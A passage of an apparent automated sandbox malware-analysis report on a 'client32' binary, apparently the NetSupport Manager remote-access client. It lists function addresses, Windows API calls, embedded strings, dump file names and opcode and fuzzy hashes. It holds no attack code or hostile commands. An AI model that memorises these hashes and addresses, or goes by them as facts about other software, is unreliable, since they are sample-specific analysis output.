                                                                              • Instruction Fuzzy Hash: A6E0DF38AC1B7973F23916204E5AFCA79458B00B20F100150FB32BC9C98B9894009698
                                                                              Function 110CF7D0 Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110CEDF0: EnterCriticalSection.KERNEL32(00000000,00000000,EE49F673,00000000,00000000,00000000,110CF110,?,00000001), ref: 110CEE2A
                                                                                • Part of subcall function 110CEDF0: LeaveCriticalSection.KERNEL32(00000000), ref: 110CEE92
                                                                              • IsWindow.USER32(?), ref: 110CF82B
                                                                                • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                              • RemovePropA.USER32(?), ref: 110CF858
                                                                              • DeleteObject.GDI32(?), ref: 110CF86C
                                                                              • DeleteObject.GDI32(?), ref: 110CF876
                                                                              • DeleteObject.GDI32(?), ref: 110CF880
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteObject$CriticalSection$CurrentEnterLeavePropRemoveThreadWindow
                                                                              • String ID:
                                                                              • API String ID: 1921910413-0
                                                                              • Opcode ID: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                              • Instruction ID: ad97ac124b8baf06b1bc187428558142c09e0612fd1a0aa1ed86d22d24e6cfad
                                                                              • Opcode Fuzzy Hash: e7ee2ccd0990f0a239e7a4ad568e4e99a575b0a85c9cc50c84e6834965f63a82
                                                                              • Instruction Fuzzy Hash: 0C316BB1A007559BDB20DF69D940B5BBBE8EB04B18F000A6DE862D3690D775E404CBA2
                                                                              Function 11081590 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 86COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}, xrefs: 11081647
                                                                              • %02x, xrefs: 11081610
                                                                              • ..\CTL32\DataStream.cpp, xrefs: 1108165E
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: wsprintf
                                                                              • String ID: %02x$..\CTL32\DataStream.cpp$m_iPos=%d, m_nLen=%d, m_nExt=%d, m_pData=%x {%s}
                                                                              • API String ID: 2111968516-476189988
                                                                              • Opcode ID: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                              • Instruction ID: 5a57582845b686d446ddd06a6d519ab032a036b4d7a2f4ef603709a16adc2e93
                                                                              • Opcode Fuzzy Hash: 18afd0e97f3a031e40cfd2a551fc180182996eee7e6a41f22d48f02a6a494389
                                                                              • Instruction Fuzzy Hash: 8621F371E412599FDB24CF65DDC0EAAF3F8EF48304F0486AEE51A97940EA70AD44CB60
                                                                              Function 1111F440 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1111AAA0: DeleteObject.GDI32(?), ref: 1111AAD6
                                                                              • SelectPalette.GDI32(?,?,00000000), ref: 1111F4BC
                                                                              • SelectPalette.GDI32(?,?,00000000), ref: 1111F4D1
                                                                              • DeleteObject.GDI32(?), ref: 1111F4E4
                                                                              • DeleteObject.GDI32(?), ref: 1111F4F1
                                                                              • DeleteObject.GDI32(?), ref: 1111F516
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteObject$PaletteSelect
                                                                              • String ID:
                                                                              • API String ID: 2820294704-0
                                                                              • Opcode ID: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                              • Instruction ID: f40c181d7eb29f9f1a68c60cce03c48cde81027a9113fa9449142c78dfeb9332
                                                                              • Opcode Fuzzy Hash: 49a3d47807c6f92d38608e4a3b8e2f849b62ff86fa01972e32864b9cc0c423b5
                                                                              • Instruction Fuzzy Hash: 7B219076A04517ABD7049F78D9C46AAF7A8FB18318F11023AE91DDB204CB35BC558BD1
                                                                              Function 110259C0 Relevance: 7.6, APIs: 5, Instructions: 73windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 110259D7
                                                                              • GetDlgItem.USER32(?,00001399), ref: 11025A11
                                                                              • TranslateMessage.USER32(?), ref: 11025A2A
                                                                              • DispatchMessageA.USER32(?), ref: 11025A34
                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11025A76
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$DispatchItemTranslate
                                                                              • String ID:
                                                                              • API String ID: 1381171329-0
                                                                              • Opcode ID: 00341069dc38fbb4dfc00e2e7f471a471adeab46effe85cccc881b86fc4bfeea
                                                                              • Instruction ID: 1d3eb3fe4f0069694488dcbc6a13b2e6f5653f41aef2ba1524fd952247bef68a
                                                                              • Opcode Fuzzy Hash: 00341069dc38fbb4dfc00e2e7f471a471adeab46effe85cccc881b86fc4bfeea
                                                                              • Instruction Fuzzy Hash: 9721D171E0030B5BE714DAA1CC85BEFB7E8AF44308F404029EA2797580FA75E401CB94
                                                                              Function 1104F179 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 69sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CAB
                                                                                • Part of subcall function 11034C90: SetForegroundWindow.USER32(?), ref: 11034CB5
                                                                                • Part of subcall function 11034C90: EnumWindows.USER32(Function_00034A20), ref: 11034CDF
                                                                                • Part of subcall function 11034C90: Sleep.KERNEL32(00000032), ref: 11034CE9
                                                                              • Sleep.KERNEL32(00000032,LegalNoticeText,?,?,LegalNoticeCaption,?,?,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F191
                                                                              • GetLastError.KERNEL32(00000000,Global\Client32Provider,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\System,00020019), ref: 1104F1DF
                                                                              • Sleep.KERNEL32(00000032,?,?,0000004A,00000000,?), ref: 1104F33D
                                                                              • Sleep.KERNEL32(00000032), ref: 1104F383
                                                                              Strings
                                                                              • error opening ipc lap %d to logon, e=%d, %s, xrefs: 1104F1E7
                                                                              • Global\Client32Provider, xrefs: 1104F1BB
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep$EnumWindows$ErrorForegroundLastWindow
                                                                              • String ID: Global\Client32Provider$error opening ipc lap %d to logon, e=%d, %s
                                                                              • API String ID: 3682529815-1899068400
                                                                              • Opcode ID: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                              • Instruction ID: 6aab5bd338832a8b6cc9a825996d00e4c24ed17e7d33d91b3ba03cdb4d861036
                                                                              • Opcode Fuzzy Hash: c4d977c9ff5073cf5f339a6a763244f2db9b90aa9ebb7fa690a9d42cd1b1b4cf
                                                                              • Instruction Fuzzy Hash: BC212638D4425ACED715DBA4CD98BECB760EB9630AF2001FDD85A97590EF302A45CB12
                                                                              Function 11163964 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 11163972
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • _free.LIBCMT ref: 11163985
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap_free_malloc
                                                                              • String ID:
                                                                              • API String ID: 1020059152-0
                                                                              • Opcode ID: 038951e35deccbe33e424bc6d0b6b01cb88aea4f76c9cdef2cbfb9def4edf244
                                                                              • Instruction ID: 99a0502aaeb7ade96a4deef53194f79690bd7c081ca6f8299ad08a7ab0eaa67e
                                                                              • Opcode Fuzzy Hash: 038951e35deccbe33e424bc6d0b6b01cb88aea4f76c9cdef2cbfb9def4edf244
                                                                              • Instruction Fuzzy Hash: 6D110837618637AADB121B74A808649FB9CAF843F8B214126E85D96140FEB2D460CF90
                                                                              Function 110B3950 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B395F
                                                                              • LeaveCriticalSection.KERNEL32(0000002C,?,?,00000000,?,1104362F,?,?,?), ref: 110B397E
                                                                              • GetSystemMetrics.USER32(0000004C), ref: 110B39A7
                                                                              • GetSystemMetrics.USER32(0000004D), ref: 110B39AD
                                                                              • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,1104362F,?,?,?), ref: 110B39DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$LeaveMetricsSystem$Enter
                                                                              • String ID:
                                                                              • API String ID: 4125181052-0
                                                                              • Opcode ID: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                              • Instruction ID: 2eabc0a5c64141517199ab689f696fc8c069b56ecca888d5095ec5d0d1156609
                                                                              • Opcode Fuzzy Hash: b61a3752badfb56f32cfb2deb03944f9272f81fb0acc9150a138a5a10ab5b813
                                                                              • Instruction Fuzzy Hash: 6F11B132600608DFD314CF79C9849AAFBE5FFD8314B20866ED51A87614EB72E806CB80
                                                                              Function 11171306 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 11171312
                                                                                • Part of subcall function 1116C675: __getptd_noexit.LIBCMT ref: 1116C678
                                                                                • Part of subcall function 1116C675: __amsg_exit.LIBCMT ref: 1116C685
                                                                              • __getptd.LIBCMT ref: 11171329
                                                                              • __amsg_exit.LIBCMT ref: 11171337
                                                                              • __lock.LIBCMT ref: 11171347
                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 1117135B
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                              • String ID:
                                                                              • API String ID: 938513278-0
                                                                              • Opcode ID: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                              • Instruction ID: 9cb08520484339131e966c5afe67267813abc49f95b778b0e1eea255b6adbda5
                                                                              • Opcode Fuzzy Hash: 35fe5c9bc94bd85c8d3435a182b19743491bdb717c624575e9545a6300ca247a
                                                                              • Instruction Fuzzy Hash: 67F0243AD04322DAE7119BB88801B5CF7A16F0073CF110249D814A77C0CFA47810CB5B
                                                                              Function 11053280 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 185COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110CF130: GetDlgItem.USER32(?,000017DD), ref: 110CF18A
                                                                                • Part of subcall function 110CF130: ShowWindow.USER32(00000000,00000000), ref: 110CF1AF
                                                                                • Part of subcall function 110CF130: GetWindowRect.USER32(00000000,?), ref: 110CF1DD
                                                                                • Part of subcall function 110CF130: GetObjectA.GDI32(00000000,0000003C,?), ref: 110CF21D
                                                                                • Part of subcall function 110CF130: GetWindowTextA.USER32(00000000,?,00000100), ref: 110CF276
                                                                                • Part of subcall function 11145410: GetSystemMetrics.USER32(0000005E), ref: 1114542A
                                                                                • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC387
                                                                                • Part of subcall function 110CC360: GetWindowRect.USER32(00000000), ref: 110CC38A
                                                                                • Part of subcall function 110CC360: MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CC39C
                                                                                • Part of subcall function 110CC360: MapDialogRect.USER32(00000000,?), ref: 110CC3C8
                                                                                • Part of subcall function 110CC360: GetDlgItem.USER32(00000000,?), ref: 110CC401
                                                                                • Part of subcall function 110CC360: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
                                                                                • Part of subcall function 110183B0: GetSystemMetrics.USER32(0000005E), ref: 110183BF
                                                                                • Part of subcall function 110183B0: GetSystemMetrics.USER32(00002003), ref: 110183DF
                                                                              • std::exception::exception.LIBCMT ref: 11053483
                                                                              • __CxxThrowException@8.LIBCMT ref: 11053498
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ItemMetricsRectSystem$DialogException@8ObjectPointsShowTextThrowstd::exception::exception
                                                                              • String ID: IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                              • API String ID: 2181554437-3415836059
                                                                              • Opcode ID: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                              • Instruction ID: 43705d0265472f43c13063854f38501adaeacc0369148bb5472ef3ca99b46591
                                                                              • Opcode Fuzzy Hash: 1accb0bbb03bc77863436f13e3d15f929dc8c171c4ae25107a4f7bd902e08966
                                                                              • Instruction Fuzzy Hash: 1E519375E00209AFDB45DF94CD81EEEF7B9FF44308F108569E5066B281EB35AA05CB91
                                                                              Function 11067090 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 139COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick
                                                                              • String ID: General$TicklePeriod
                                                                              • API String ID: 536389180-1546705386
                                                                              • Opcode ID: 583a630acb21db53e34cc03cdf69896ea0eaf712d7d07d60b781f99cd72e8e82
